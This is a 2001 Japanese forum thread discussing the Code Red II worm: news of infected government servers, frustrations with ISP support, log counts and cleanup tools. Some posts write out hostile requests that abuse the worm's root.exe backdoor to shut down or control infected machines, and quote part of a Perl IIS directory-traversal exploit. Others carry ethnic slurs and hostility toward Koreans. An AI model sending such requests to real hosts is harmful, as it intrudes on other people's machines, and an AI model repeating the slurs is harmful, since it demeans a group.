http://www.yomiuri.co.jp/04/20010816i101.htm
しっかり対象製品名を示さないとなんの意味もないよ｡報道しない方がマシ｡

Name: ppp010.mal.jp.rim.or.jp
Address: 202.247.157.137

　　　　　　　　

>>232　ワラタ
ウイルス対策会社「シマンテック」（東京都渋谷区）の星沢裕二マネジャーは
「個人もお金をかけて企業に近い安全対策を取らないと、社会の損害はますます
広がる」と警告している。

ノートン大売れ、株あがるか？

>>234
CR-IIはシマンテックのやらせだったりして・・・

シマンテックの販売促進部のなかにプロジェクトＣＲなんてのが
あったりして・・・

ソイレント・グリーンって知ってる？

http://www.yomiuri.co.jp/04/20010816i311.htm
この件についての情報はきっちり公開してくれるんだろうか

その昔パソコンゲームのフロッピープロテクト屋さんがありました。
ゲームメーカに対しては、プロテクトを掛けるお仕事。
秋葉原では、ファイラーとしてそのプロテクトをはずす商品を売っていました。

今ではシマンテックさんが同じ事をしていると思います。

>>237
ううう ストーリが思い出せない。

人肉食べるやつだよね。
スマン。それしか覚えていない。

2001 年 8 月 15 日 IIS 用の累積的な修正プログラム (MS01-044)
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-044

ウィルスという安易な表現が隠しているもの

http://www.hotwired.co.jp/bitliteracy/iwatani/010123/

文科省コンピューターにウイルス侵入痕、サーバー休止
http://www.yomiuri.co.jp/04/20010816i311.htm

　インターネットを通じて行政文書のリストなどを検索できる文部科学省の情報公開用サーバーで１６日、コンピューターウイルスの侵入を受けた痕跡が見つかった。
外部からデータを不正に改変するための“道具”が埋め込まれており、同省は「このサーバーを足掛かりにして、省内の別のコンピューターなどに侵入される恐れがある」として、
同サーバーを休止し、被害状況を調べている。

　公開されているリストは本来、インターネットから接続した利用者は閲覧するだけで、内容を変えることはできない。
ところが、改変を可能にする“道具”が、サーバーのシステムにいつの間にか組み込まれていた。
同省は、世界で猛威を振るっているコンピューターウイルスの「コード・レッド」が侵入して残した痕跡ではないかとみている。

　同サーバーは今年４月、情報公開法の施行に伴って稼働したが、蓄えられたデータ自体には今のところ、
改変などの被害が見当たらず、同省は「かなり以前に侵入されたのに、今まで気付かず、何者かが省内の他のコンピューターへ不正接続する足掛かりとして悪用した可能性もある」として、過去の接続記録などを調べている。

(8月16日17:42)

「ばっくどあ」全開でサービスしてる人への警告メッセージ考えてみました。

net send * "あンた、背中が煤（すす）けてるぜ (c)能條純一"

関西電力のeonet.ne.jpって所からアタック来たのでIPアドレスと
アタック日時を連絡したら、
> 誠に恐れ入りますが、頂いたご質問の趣旨を
> 十分に汲み取る事ができませんでした。
> 誠に申し訳ございません。
> 特にどのような状況でどういった攻撃を受けられたのか
> などをお知らせくださいますようお願い申し上げます。
今時CodeRedIIによるアタックが理解できんとは、なかなか"ほのぼの"
とした業者のようだ。関西に住んでれば入会してみたかったところだ。

あぶないリンゴのお話。
http://www.disney.co.jp/cybernetiquette/netiquette2/index.html

>>245
とぼけてるんだよ。

今、NHKで文部省のコードレッド関連のニュースやってた。
コードレッドのことを「赤い暗号」だとさ。
しかも言いよどんで、「あっかいあんごう」って。
ネタ？

アッガイ暗号。

>>247
そっか、「突っ込み」やって欲しかったのか。サポート部隊がとっさにそういう
応答できるとはさすが"関西"電力...俺も修行が足らんな。スマソ＞eonet

今日お通夜ができて今帰ったヨ

>>246
全部見てしまった・・勉強にナタヨ

今日､InfoSphereから会員向けにメールが出たけど｡

>□ 対策・予防方法
>マイクロソフト社のIISサーバを使用している場合、まず自サイトがCode Red/Code
>Red IIに感染していないかどうかのチェックを速やかに行ってください。
>株式会社シマンテック（感染チェック用サイト）→
> http://www.symantec.com/region/jp/securitycheck/codered_secutitycheck.html
>また、このワームの侵入を防ぐために最新のパッチを適用することを強くお勧めします。

｢パッチを適用することを強くお勧めします。｣って､
あてねーと､すぐに再感染しちまうのに｡"お勧め"はネーダロ｡

>>248
あかいアンコウ？

>>245
eoっていうと､無線のやつだっけ｡
無線で鯖建ててるとは｡ｶｺｲｲ｡

>>251
うちのご近所さんもお通夜だったみたいだが｡

今日はオレの通夜だ。

え〜ん氏またＵＰしてるし
あれは強烈じゃない？

いくら色調補正してあるとはいえ・・・ねえ

symantac
だからネタ？

>>258
シマンタック　（ワラタ

>>213
root.exeがあったそうでやんす

>>257
そのまま載せる度胸ありまへん

>>254
そうそう、そこででかい態度だったの漏れ

>>213
怖いな、こんなガキまでIIS使っているのか。sage

>>260
たぶん「￥感染してます」ってフォルダー作って
自慢したかったんじゃない？

>>264
回答者の
http://profiles.yahoo.co.jp/Secure1993/?.src=prf&.done=http%3a//messages.yahoo.co.jp/bbs%3f.mm=CP%26action=m%26board=1835584%26tid=a5qa5bdkbdava5a6a5a4a5ka59%26sid=1835584%26mid=2&lg=jp
にも随分楽しませてもらいました
今日はぐっすり眠れそうです

今日はもう寝る

みんなおやすみ

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067

ツールアップデートしてました。

Ver1.40　→　1.80　の修正点：
・メモリ検索精度の向上：
　メモリ中の「CODERED.C」の検索精度がアップしました。

・IIS設定削除の追加：
　改変されたIISの仮想ディレクトリを削除するように処理を追加

・検索オプションの追加
　レジストリのチェックのみを行う「/R」オプションを追加。

だそうです。

例の『コードレッドバスター』なんだけど
数はすくなくなって、中身無しってのが多くなってはいるけど
時々、フィルタすり抜けてくる可愛いヤツがいるんだよ
なかなか可愛いヤツよ

16日のご来場
NNN様、118匹
XXX様　　0匹
正直な話ちょっと寂しい・・・
完全な減少傾向です。

ところで赤虫とは直接関係ないと思うけど、ログを詳しく眺めて
たらこんなのがあった
210.111.*.* - - [12/Aug/2001:22:37:26 +0900] "GET /NULL.printer" 404 -
これってなんかのアタックかな？どっかでＩＩＳのプリント関係のセキュリティー
ホール情報を見た気がするんだけど見つからない。

私がノートンやトレンドマイクロの人間だったら
自分でウィルスを作って、自分で駆除用ワクチンをつくります。
おそらくこれと同じことをすでにやっているでしょう。

電波な話はやめれ
今まで捕まった犯人がカワイソウや

あったまわりー
てめーでつくんのかよ。
>>270

既出？

マイクロソフトがセキュリティー・ソフトを発売
http://japan.cnet.com/News/2001/Item/010215-2.html?rn

---------------
まさに盗人に追い銭

可哀想なインターリンクユーザーのスレ

Interlink(Zoot)さんいいかげんにしてください。
http://salami.2ch.net/test/read.cgi?bbs=isp&key=997883622

>>273
それは､昔から有るMS-Proxy Serverの新バージョンだよ･･･
串デスネン｡

文科省サーバーに「コード・レッド２」が感染の恐れ
http://news.yahoo.co.jp/headlines/mai/010817/dom/06000000_maidomm094.html

>>127
わかってるよ、馬鹿。

>>273
MSのことだからそれ自体にセキュリティホールがありそう。

文科省を踏み台に米国防総省を攻撃なんてなってたら
カコワルイね

しかし１日５０件ほどの閲覧って、ﾁｮﾄｻﾋﾞｼｲ　＞文部省

>>270
アースやら大正製薬がゴキブリばらまいてるのと同じやね

>>281
なはは…キョーレツな喩えなるもナトク。
とはいえ漏れ個人的にはセマン信じてるが、以下の構図は暗黙としてありかな
１： げーつんとこ、のーとんさんに義理を通してヘボいＯＳタレ流す
２： のーとんさんとこ、せっせとソレにつぎ当てる
３： 双方丸く収まる。わははわはは
４： ユーザー、イカゲンニシロヨと泣く。

>>282
ｱﾅﾀ ﾆﾎﾝｺﾞ ﾍﾝﾃﾞｽﾖ

話題としては面白くない事もないんだけどね、
最近、蚊が3月から11月まで活動するようになったのは
某製薬会社の研究所によって開発された改良型の蚊が
ばらまかれているからだ、なんてね。

でも、根拠がないわけだから、いわゆる妄想だよね。

今回の事は既知のセキュリティホールだったからこんな規模で済んでいる。
もし未知の穴だったら？ と想像するだけで恐い。
ところで、最近は、セキュリティ関係の会社がＯＳのベンダー企業と
連絡を取っていて、パッチが配布されてからしばらく後に
穴の情報が公開されるという順序になっている。
しかしこれが事前に漏れる事は無いとは言えない。もちろん、仮定の話ですが。

未知の穴って､しばらく眠らせるんでしょ｡クラッカーの持ちネタとして｡
んで､手製バックドアしこたましこんでおいて､頃合いを見て発表していく｡

国土交通省　下館の感染止まりました。しかし、メールフッタに俺の
Server書いてたもんだから、毎日見に来てるなぁ、、掲示板くらい何か書いてくれるとありがたいんだけど。毎日覗かれてるよ。

.printerにも何かセキュリティーホールがあるのかな。
たまに混ざってる。

http://news.yahoo.co.jp/headlines/mai/010817/dom/06000000_maidomm094.html
文部省のサーバーが感染したみたいだけど、点検したときにパッチを当てなかったのかな？
もし、そうだとしたら、文部省のサーバー管理の人間ってアホだね。

>>278
まさにそのとおりになったよ。MS01-045 が出た。

>>289
点検なんてしてねーよ。
責任逃れだって。
保守管理なんて、全くしてなかったんだよ。たぶんな。
点検してれば、パッチ当てるに決まってるだろ。
そいつ、首にしたほうがいいぜ。

点検ってホコリを取ることだよね

MSのHotmailサーバーもやられたらしいけど、ほんと？

管理はMSでやってないのかな〜

新たな動きは有りません。
以上、現場からお伝えしました。

　同省情報化推進室によると、同日正午ごろ、利用者から「サーバーに異常がある」と通報があり、職員がサーバーシステムの中にコード・レッド２が侵入しているのを確認した。
日本も韓国と対して変わらないな。
はずかしいよ・・、ほんとに。

e-japanだよね〜
http://www.kantei.go.jp/jp/it/network/dai1/0122summary_j.html
ダサっ

今週のテレバイだｰは「ウィルス」特集
http://www.mxtv.co.jp/bangumi/variety/televaida/

某MLネタなので既に知ってる人もいると思うけど、
CodeRedアクセスしてきた相手のバックドアを付いて
シャットダウンさせるCGIスクリプトだって。
http://ns1.prometheusmedia.com/default.ida

>>298
これをperl入れたマシンに　default.ida　とリネームして置いておけば
いいわけね？

default.ida??ZZZ
したマシンはどうなる？
shutdownって　shutdown -h　nowみたいな感じ？
そうだったら
それはそれで逆にまずくないかよ？
おもしろそうだけどな（ｗ

http://www.rbbtoday.com/news/20010817/4521.html
東めたがやっとポート開放するらしい。

>>299

使うhttpdにもよると思うんだけど、cgiとして実行する
拡張子にidaを登録する必要があると思うな。

>>298
根本的な原因を解決する物では無いと思う。

hotmailがさっきからエラー出すんだけど･･･Coderedがらみかな。

手動でも落ちたぞ

http://相手のアドレス/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5

zaq.ne.jpから来るCodeRedIIアタックが全然減らないんで、HTTPDのlogの
先頭部分のIP/Timestamp切り出して「何とかしてくれ」って送ったら下記の
内容が添付されとらんと対処できないと言ってきた。こんだけ騒ぎになってる
のに、今時こんな事言ってくるプロバイダ他にないぞ。
>１．攻撃された具体的な内容
>２．ポートスキャン、アタックなどであれば、そのポート番号
>３．上記の現象の発生頻度
ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。Zaq
からのアタックが減らないのも無理もない。

>>301
何だかんだでしっかりしとるじゃないか。＞東めた

感染元サーバーをNICのwhoisで調べてメールするとUser unknown。
こういうのって腹立つやら空しいやら・・・・

>>305
＞こんだけ騒ぎになってる
＞のに、今時こんな事言ってくるプロバイダ他にないぞ。
＞ぐたぐたごたくぬかす前に調べんかい。ここのサポートって最低っすね。

この部分をぜひメールで言ってやってくれ
聞いてるだけでむかついてくる

>>304
本当？
これやってもアクセスできるってことは落ちてないってことだよね。
うーん…… >>298 を動かした以降何件もCodeRedアクセスあるんだけど、
どこも落ちてないみたいなんだよね。

/scripts/root.exe?/c+iisreset+/stop

これってあってんのかな。手動でも効かないみたいなんだけど……

【zaq接客マニュアル】
何かと妙な事を聞いてくる人＝クレーマー
何かと同じメールを何度も送る人＝クレーマー
何かと妙な引用文を添付する人＝クレーマー
何かとすぐ怒る人＝クレーマー
何かと「攻撃された」と言う人＝クレーマー
何かと「何とかしろ」という人＝クレーマー
何かと「弁償しろ」と言う人＝クレーマー
何かと「責任者を出せ」という人＝クレーマー
何かと「通報するぞ」と言う人＝クレーマー
何かと「告訴するぞ」と言う人＝クレーマー
何かと「サポート最低だな」と言う人＝クレーマー

>>309
捕まらないうちにやめておけ。

>>304
それってWin9xにしか効かないんじゃ?
エラーダイアログ出るだけでは?

めたりっくに対策しろメール送ったのに放置され、いつのまにかTopが変わってる。
全部なかったことにしようとしてんじゃねーだろーなあ

わざと自分のNT系マシンからdefault.idaでアクセスしてみれば?

>>312
すまん確かにデュアルブートだった

rundll32 user32.dll,SwapMouseButton

>>316
面白いけど、相手のマウスが使い難くなっても何の役にも
たたないよな……

>>308
>>310

「だからCodeRedIIだと言ってるだろうがゴルァ！」と表現を若干和らげて
その旨メールしてやったらzaq.ne.jpからの回答：

>度々恐れ入りますが、
>　２．ポートスキャン、アタックなどであれば、そのポート番号
>　３．上記の現象の発生頻度
>
>　上記の2点につきまして、ご返答いただけますでしょうか。

zaq.ne.jpには「1:通報者は真実を言っているとは限らない。まずは疑って掛かるべし」
ってサポートマニュアルがあるようだね。駄目だこりゃ。国内で最後までCodeRedII
が残るのzaqかも。さすがに切れて >>305 のような内容の返答しときました。

つまり >>298 は改造しないかぎり全然役に立たないってことか（鬱

最盛期からは落ち着いたけど未だに１時間に２０件ほどは来てるし。
まだバラ撒いている奴はいい加減晒してもいいんじゃないかとさえ思ってしまうよ。

ZAQ、ASAHIネット、WAKWAK・・・・最後まで生き残るのはどこだ！？

>>321
大学にはかなわん。

>>321
最後なんてくるんだろうか……このまま永遠に……

あんまり登場しないけどiij4uもなかなか凄いっすよ。
感染者いっぱいで病院状態。

絶滅しそうになったら今度は保護活動がしたくなったりして。

絶滅危惧種”ｃｏｄｅ　ｒｅｄ�U”
REDBOOKに載せるんですかぁ〜

ＩＩＪだけどＷＩＮ９８だから関係無いや。

根拠ないただのzaq.ne.jp誹謗中傷と思われるとちょっと嫌なので。
8月17日0:00〜24:00の私の所のHTTPD logで、CodeRedIIによるア
タックは全部で144回。そのうち国内プロバイダからの分は
28 zaq.ne.jp
8 alpha-net.ne.jp
5 wakwak.ne.jp
5 eonet.ne.jp
2 infoweb.ne.jp(nifty)
1 odn.ad.jp
という事で、煽りじゃないです。現実にうちでは他のプロバイダからのは
減ってるのに、zaqからのアタックは全然減らなくて、zaqの同一アドレス
で今週初めからずっとアタック続いてる奴すらいる。alpha-netも評判通
りの活躍してますね。

正直、ビシッといってやって欲しい

>>328
あなたのプロバーだーがどこだか分からないと、その統計に関してはコメントできないなぁ。
現にうちはザクからなんてここ1週間着てないもん

>>330
そりゃそうだろうよ。
Address: 211.124.0.131
Aliases: www.zaq.ne.jp

>>330
どうせ328はZAQユーザだろ。うちはJCOMだけど、今までの約３５００件の
うちの1/3がJCOMのユーザ仲間からだ。CATVの威力炸裂だね（藁
ログ取り始めたのが今月の7日なのだが、そのときから毎日欠かさずアタック
してくるアホがいる。いい加減気づいてくれよう。

>>328
おいおい、そりゃ君がｻﾞｷｭに近いってことしか
言ってないのでは?
ぃゃ漏れはｻﾞｷｭと関係ないんだけどね。
ウチはバラエティ豊かな202なんで、ホントどこから
でも来てます。国内ではスピードとハイホーって感じ。

反省しる！
http://japan.donga.com/data/20010412/photo/2001041212148.jpg

>>334
これ、元ネタ分からないんだけど。
この人たち天然？それともネタ？

>>213
ネタじゃないのか（ｗ

>>335
コラ

>>330
>>332
>>333
うちはzaqではないが61.205系なので、それ以外だとどうなってるかは知らん。
ただ１つ言えるのは、少なくともうちのLog見る限りでは、先週までとかは他の
プロバイダーからのアタックもたいへん多かったのでzaqは別に目立たない存在
だった。ところが今週になって他のプロバイダーからのは減ったがzaqは一向に
【減らない】ので目立ってきた。8月12日から今日までずっと固定アドレスで
アタック続けてる奴とかもいる。結果的に今うちのLogではzaqは中国・韓国を
含む全体数の約2割と、他を圧するアタック数を誇っている。それでこいつら
仕事しとるんか？とメール出したらこうなったってわけ。

ああ、感染者が減ったんじゃなくて上流でフィルターかけたのね。
それなら納得。

10日付けで返事貰った内容だと。
俺は地方のISP、zaqからは少しだけあって、それもFrontPageでサイトまるまる編集し放題なやつだった。
／／
お問い合わせの件でございますが、
ご迷惑をおかけ致しまして誠に申し訳ございませんでした。

　今回お送り頂きました情報で調査しましたところ該当のアクセスは
弊社ユーザーの「ＣｏｄｅＲｅｄ」感染端末からのワーム活動と判断
されましたので、早速、該当のユーザーに対してＣｏｄｅＲｅｄ感染
に対する注意、警告等の対応を実施させていただきます。
以下　長々と謝罪文。。。
結構まともだったぜ。

>>338
あの〜、CR2は1日で感染活動(ｱﾀｸｼﾞｬﾅｲ)止めるんスけど。正確にはcnドメインが引けたら48時間で他は24かな?

いやーISPの対応もいろいろあるってのは同感だねー。
この件に関しては文句も何も言ってないけどね。どこにも。

しかしdns.**.co.jpとか来てたりしてて最強にヘボまってしまうよこっちが。

>>341
自己拡散を【止める】のではなく【止めてリブートする】です。
その結果ほぼ確実に再感染する。
また再起動は自己拡散を止めるのが目的ではない。
MS00-052 未パッチでアドミンがログインした場合に
バックドアを有効にするため。
何度もガイシュツですが
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

>>335
中央にいる方は、歴史教科書問題でハンストデモを行う為
来日した韓国の国会議員です。看板の「しる」は天然です。
両隣りにいる方は、確か社民党の議員です。冷たい人達です。

本文にリンクしてやれよ。
http://japan.donga.com/srv/service.php3?biid=2001041212148

そうか、ハマコウじゃなかったのか。

オレもハマコーだと思ってた・・・

http://www.asahi-net.or.jp/~ki4s-nkmr/
> ただ、今回の混乱の中で明らかになったこととして、PWSが組み込まれていた
> Windows 4.0のWorkStation環境に、Windows 2000 Professional版を
> アップグレード　インストールした場合、このPWSがIIS 5.0へ自動的に
> 置き換わるのだそうです。今回の騒動では、この条件のユーザーの大半が
> 自分はIISではなくPWSを利用していると錯覚していたように思います。

> との件ですが、Win98SEでも同様の現象を確認しております。

なんかPWSが入ってたWinをWin2kにアップグレード(笑)すると
PWSもIISに自動アップグレード(笑)されるみたい。

なるほどね、また謎が一つ解決しちゃったね。
連続攻撃はルーターの内側の機械達が力を合わせてがんばっていると
いう事でとりあえず納得出来るし。
「あとはCode RedIIと同時にPort187のNetbios名取得が来るは何故？
何故なの？」ぐらいかな。

うちは、203.x.x.xのせいか、攻撃のほとんどは韓国からです。
韓国逝って良し！

Registryが不明なときは(ほとんど不明だけど)、ここが便利です。
whois -h whois.geektools.com xxx.xxx.xxx.xxx

Win9xで誰がなんと言おうと全部インストールすると決めてるユーザーは2Kアップデートでお陀仏さんになってしまうのか。
危険だと言ってもＯＳがＶＡＩ○だったりＳ○ＴＥＣだったりする人達では全面拒否必至だろね。
そんなやつ周りに沢山いるな。つーか今じゃそんなのがフツーじゃん。

なるほどねー。
PWSって、Officeに付いてこなかったっけ？

プリインストールマシンにくっついてくるOfficeには付いてない。
FrontPageがくっついているパッケージには付いている。
FrontPage入れるとPWSも自動で入ります。

あと、SOHOや小規模の企業が2000サーバーに金だすのが嫌で、
Macとのファイル交換用にPWSやIISを内部に立てることが間々ある。
実際やらされた・・・。今どうしてるだろう。
Win2000マシンがあるのにWin2000のCD-ROMがない会社。
たぶん今でもCodeRed送り続けているだろう。

侵入者IPが211〜だったらﾁｮｿなの？

つーかCodeRedってIPの近いところを攻撃するから韓国中国からの
攻撃がメインになってあたりまえなんだよな。あちらさんのほうが
ブロードバンド環境は進んでるし。

>>349
今日は一つ得をしたよ
あんたいい人だ
ガキの中のガキ大将って感じだ
これからも宜しく頼むよ

>>347
ここ湯名なのね、リンクに加えときます。

>>347
お礼忘れた、ありがとさん

FrontpegeってマイクロソフトでダウソできるバージョンでもPwsやらIISやら組み込まれるの？？

・太平洋回線は太平洋に面してる日本しか敷設してない
・東西のインターネットゲイトウェイはアメリカにある
ので、韓国がアメリカのインターネットにアクセスするには

[韓国]==(日本海ケーブル)==>[日本のゲートウェイ]==(太平洋ケーブル)==>[アメリカ]

という経路を通らなければならない。これ以外の直接経路は衛星回線のみ。
この中で太平洋ケーブルはほとんど日本の持ち出し。これを韓国はタダで使ってる。
逆にこれを使わないとアメリカには繋げない。
しかしこのままでは韓国のCodeRedで世界が迷惑するのでどうするか？
・日本海ケーブルを閉鎖する。
これをやると韓国のパケットは日本にも来ないのでCodeRed対策としては万全。
タダで使っていた韓国のパケットが太平洋ケーブルから消えるので
本来使用すべき日本の分の回線が空く。
太平洋のケーブルの回線増設も遅らせる事が出来る。
韓国に不都合が起きるのはどうでもいい（細い西回り回線とか高い衛星回線もあるし）

マジでぶった切って欲しいよ、日本海ケーブル・・

重複ｽﾏｿ

結構、ネットワークのレベルでのツールが出てきたな。
既出のものも含めてまとめてみた。他にもあったら教え
てくれ。（サーバ単位の診断やパッチは除いた。）

NTK？ツールの名前は分からん。反撃shutdown
　http://ns1.prometheusmedia.com/default.ida
eEyeのCodeRed Scanner　結構痛いスキャンだ
http://www.eeye.com/html/Research/Tools/codered.html
emailで管理者へ通知EarlyBird
http://www.treachery.net/~jdyson/earlybird/
極めつけnet sendで警告メッセージ CodeRed Vigilante
http://www.dynwebdev.com/codered/
CodeRedProve (Probeの間違いの説も　藁）
http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip

こんな感じだから、root.exe?/c+dir くらい、誰も
後ろめたく思っていないみたいだね。

感染して迷惑かけたヤツは光ファィバー１Ｋｍ敷設させるってのはどう？

韓国政府にメールで抗議ってのはどうかな？
賛同者が多ければ、メールアドレスと英語(韓国語中国語はできないので)のテンプレ作るけど。
それともこーゆー話はニュース板とかでやったほういいのかな？

『日本海ケーブル』は『東海ケーブル』と呼ぶニダ

それじゃ静岡のCATV会社みたいだに。

>>361
まとめありがとう。早速Vigilanteを動かしてるよ♪

ん〜、減ってきたようにも見えるけど。
これって、気づいてない奴は一生気づかないような気が・・・

つーか一番悪いのはCodeRedの製作者だろ

>>359
そういった回線共有を否定することはインターネットを否定することじゃん。

Name: nttkgwa03102.ppp.infoweb.ne.jp
Address: 61.124.33.102

>>369
そういう声が出るって事は「あの国」にはインターネットは分不相応な
システムだって事だね。コピーシステム使っている奴ってWindowsUpdate
のボタンを押せないんだよ。惨めな連中だ。

変種が来た。1バイトだけ違うの。
00000000 C8 C8 01 00 60 E8 03 00 00 00 CC EB FE 64 67 FF
(略)
00000810 30 00 00 00 04 00[08]00 10 00 00 00 00 00 00 00
　　　　　　　　　　　　　　　　　　　↑このへん

ここから80番ポートに結構アクセスが来るのだが、
CodeRedなのか？

>> 2001年8月19日14時38分37秒 HttpHead - 210.136.88.94

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Sun, 19 Aug 2001 06:04:42 GMT
Content-Length: 3264
Content-Type: text/html

最近、CodeRedそのものよりも、どさくさにまぎれてとか、
プロバイダが会員の安全のためと称してポートスキャンかけ
たりとかで来るアタックのほうが多いかもしれない。

少なくともHTTP port probe のすべてがCodeRedという
わけじゃあないよ。

>>374
そっかぁ。ルーターがブロックしてくれるからいいけど、
有名企業からだと心配になるんだよねぇ。

眺めてるだけにしますわ（＾＾；

20日をすぎると、感染端末はホワイトハウスを攻撃するんでしょうか?
攻撃機能はCode Red (original)にはありましたが、Code Red2にも組みこまれて
いるんでしょうか？
おしえて、えらい人

>>376
ホワイトハウス攻撃機能はないと聞きました。情報源は忘れました。まあ、究極的に
はeeyeのディスアセ見れば判るんでしょうが。
CodeRedに対する報復としてUSの誰かが作成したバージョンだっていう意見もありま
すしね。もっとも本当の意図は作成者の味噌汁。

>>377
>>2さんのリンク↓にあるよ。
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
★Code Red★
　日付により行動パターンを変更
　1日 - 19日 他のホストに感染する
　20日 - 27日 whitehouse に DDoS 攻撃をする
　28日- 月末 休眠する。
★Code Red II★
　感染後 24〜48時間感染行動を続け、
　その後サーバをリブートし感染を停止
　2001年 10月 1日以降は活動を停止

うちの場合CodeRedと思われるのはUSとかCAとかAUからのアクセスの方が多かった。
あとは典型的なポートスキャン野郎くらいだな。

うち(203.x.x.x)だとCode Redはレアもの
過去24時間でNNNNNNNが1/62、XXXXXXXが61/62
この調子が当分続くのね

上がったんで気が付いたんだが
http://ton.2ch.net/test/read.cgi?bbs=sec&key=994160787
ここの１８，１９の書き込みＩＩＳのバッファオーバーフロー攻撃のやりかた
知ってたようだな。

18 名前：27 投稿日：2001/07/05(木) 01:02
#!/usr/bin/perl

use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-HACK-PROGRAM

Example: c:\\perl uni.pl www.theriver.com:80 {OR}
c:\\perl uni.pl 127.0.0.1:80\n";}
($host,$port)=split(/:/,@ARGV[0]);
print "Trying $host.....................\n";
$target = inet_aton($host);
$flag=0;

# ---------------test IF IIS
my @results=sendraw("GET x HTTP/1.0\r\n\r\n");
foreach $line (@results)
{
if ($line =~ /Server: Microsoft-IIS/)
{


19 名前：27 投稿日：2001/07/05(木) 01:04
sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n");

それはsadmindの手口。バッファフローじゃなくてshellの相対パスの
脆弱性ってやつ。

>>381-382
それ、昨日うちに来たよ。なぞが解けたthnx
-------Access Log-------
209.111.91.22 - - [18/Aug/2001:03:37:53 +0900] "GET x HTTP/1.0" 501 159 - -
------------------------

>>383
ほんとだよく読んだらちがった。鬱だ芯でいい？

スレ、途中で質問いい？

　俺のところの東急ケーブルは、プライベートIPで配ってるくせに
ウェブサイトで赤虫を警告してるんだけど、赤虫ってプライベートIPのIIS
にも感染できるの？

　ゲートウェイでNATがかかってるので、感染できないって思ってたんだけど。
つうか、プライベートIPでIISって言うのも理解できないよ。

企業の内部ネットワークもやられているくらいだからな。

ボケが感染したノートPCを持ち込んだりすると、一気に
プライベートなLAN内赤虫だらけ。IISは既出のように、
本人も意識しないで、インストールされてしまうことも
ある。

>>386
CATVと併用して他のダイヤルアップやADSL、専用線等を使用しているとそいつが外部から感染してそれが一気にＣＡＴＶ域内に流れ込むんだよ
例えファイヤーウォールのあるLANを構築していてもIISが外部からのアクセスを許していると無意味、感染するとLANを通して域内にも攻撃を仕掛ける
CATVが流入を食い止めてもユーザーが裏口作ってセキュリティをガタガタにしてるわけ

ところで十Ｑ毎日のように感染マシンが増えてるな
夏休みの宿題でIISインストールしてホームページでも作ってるのか？
DNS名が SOTEC-E4150AV にはワラタ

>>389
それは、NetBIOS名かと思われ。
うちは OTOSAN ってのが居た。

おぉ、ファザーコンピューター。マザーが停止したときに
目を覚ますやつだな。

>>390
ってことはNetBIOSoverTCP/IPも有効にしてるのか
それにしても全角の物もあるけどNetBIOSって全角文字も使えるとは知らなかった

>>388

　感染経路として他回線との併用ですか・・・。

　網内の感染したホストから、再び外部のグローバルIPに戻ることも
考えられますね。それって、東急ケーブルテレビが網内に赤虫が
入ってるって検知してるのでしょうか。

>>386
１０９警告してるだけ良いぞ。

うちのプロバは、警告を出すと驚いたユーザがIIS止めてしまって
赤虫の捕捉できなくなるから、わざと警告しないと豪語している。

>>394
「なるほど〜、じゃあ、赤虫をさぞかし一生懸命捕捉しているのですね〜☆ミ」
という突っ込みをなさってはいかが。

>>391
w

http://jun.ient.or.jp/~ishikawa/OTOSAN/otos1.html

>>395
したよ。
週末は当然サポートも技術もお休みなので、ユーザからの声は受け付
けていません。藁）
4日前にきた同一プロバの感染者、また再感染したようだ。（NetBIOS
名から判断）。マジ、この機会にプロバ変えたほうがいいかもな。

>>393
そんなヘタレなプロバでも、域内で赤虫の存在は知っているようだか
ら、等級も知って動いてんだろう。CodeRedとは異なる感染検知のた
めのスキャンとか時々来ないか？

ttp://search.cpan.org/doc/REUVEN/Apache-CodeRed-1.07/CodeRed.pm

あほだ、こいつ。

>>361

>NTK？ツールの名前は分からん。反撃shutdown
>http://ns1.prometheusmedia.com/default.ida

これ家の鯖に仕込んだらやっぱマズイかなぁ・・・・
なんか面白そうなんだけどさぁ。。。

　　　　　　　　　　　　　　　　　　 _ , -―-､
　　　　　　　　　　　　　　, 'ﾆニﾆ､::::(0::::::::::ヽ、
　　　　　　　　　　　　　　 ￣￣ヽ':::::::::::::::　　ヾ みてごらん　この糞スレを
　　　　　　　　　　　　　　　　　　　）:::　 ....　　　＼
　　　　　　　　　　　　　　　　　　/　　　　::::::::::::::::::ヽ
　　　　　　　　　　　　　　　　　 /　　　　　　:::::::::::::::::|
　　　　　　　　　　　　　　　　　/　　　　　　　:::::::::::::::::|
　　　　　　　　　　　　　　　　 /　　　　　　　 :::::::::::::::::::|
　　　　　　　　　　　　　　　　/　　　　　　　　::::::::::::::::::::|
　　　　　　　　　　　　　　　　|　　　　　 　　　:::::::::::::::::::::|
　　　　　　　　　　　　　　　. |　　　　　　　　　:::::::::::::::::::::|
　　　　　　　　　　＿ , ―-､|　　　　　　　　　/::::::::::::::/::::|
　　　　　　　　　　＼ｦ'⌒ヽ:|　　　　　　　　 /:::::::::::::::/::::::|
　　　　　　　　　　　 ト｀_ ノ::|　　　　　　　　/:::::::::::::/::::::::|
　　　　　　　　　　　人;;;;;;;::::;:|　　　　　　　 |:::::::::::::/::::::::/
　　　　　　　　　　/γ　　｀:::::|　　　　　　　|::::::::::::/::::::::/
　　　　　　　　　 / （　 ヽ 　 :::|　　　　　　　|:::::::::/::::::::/ 　　ふーん、なんだか
　　　　　　　　　｛　 ）　　}　　::|　　　　　　　|::::::::{::::::::/ 　　　頭悪そうだね、ぱぱ
　　　　　　　　　 |　/　　 〉 　 ::|　　　　　　 .ヽ::::|:::::::/
　　　　　　　　　 }　{　　/　　　::|　　　　　　　.ヽﾉ ::::/
　　　　　　　　　 }　|　 （　　　　:λ　　　　　　　　 :::|
　　　　　　　　　（　ヽ、 〉　　　 ﾉヽ　　　　　　　　::::|
　　　　　　　　　 ヽ, 　 ~　 　　〈　 ト､＿　 | 　　 ::::::ヽ､
　　　　　　　　　　（　　　　　,' ﾉ　 |　　　|~7　　::::::::::::::｀ヽ、
　　　　　　　　　　 ヽ,､,､,γ' ノ, -‐Ｗ~フ　{　　ト､:::::::::::::::::::ヽ、
